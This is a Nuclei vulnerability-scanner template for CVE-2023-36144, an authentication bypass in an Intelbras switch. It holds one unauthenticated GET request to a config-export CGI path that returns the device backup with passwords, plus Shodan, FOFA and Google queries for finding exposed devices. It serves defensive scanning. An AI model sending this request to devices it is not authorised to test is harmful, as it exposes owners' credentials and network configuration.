nuclei-templates/http/cves/2023/CVE-2023-36144.yaml

58 lines
1.8 KiB
YAML

id: CVE-2023-36144
info:
name: Intelbras Switch - Information Disclosure
author: gy741
severity: high
description: |
An authentication bypass in Intelbras Switch SG 2404 MR in firmware 1.00.54 allows an unauthenticated attacker to download the backup file of the device, exposing critical information about the device configuration.
remediation: |
Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-36144
- https://github.com/leonardobg/CVE-2023-36144
- http://intelbras.com
- https://github.com/nomi-sec/PoC-in-GitHub
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2023-36144
cwe-id: CWE-862
epss-score: 0.03179
epss-percentile: 0.91154
cpe: cpe:2.3:o:intelbras:sg_2404_mr_firmware:1.00.54:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: intelbras
product: sg_2404_mr_firmware
shodan-query:
- title:"Intelbras"
- http.title:"intelbras"
fofa-query: title="intelbras"
google-query: intitle:"intelbras"
tags: cve2023,cve,intelbras,switch,exposure
http:
- method: GET
path:
- '{{BaseURL}}/cgi-bin/exportCfgwithpasswd'
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'System Description'
- 'System Version'
- 'System Name'
condition: and
- type: word
part: header
words:
- 'attachment;filename='
- type: status
status:
- 200
# digest: 490a00463044022015c8d803dd17aa15d2b5b1fd7082fa9e5137cef412e74f60e9f69a8f170226a70220359f792ecb6d7df6a0bba14872b10f3d32a06043c855bd4c8f2b347eeff46deb:922c64590222798bb761d5b6d8e72950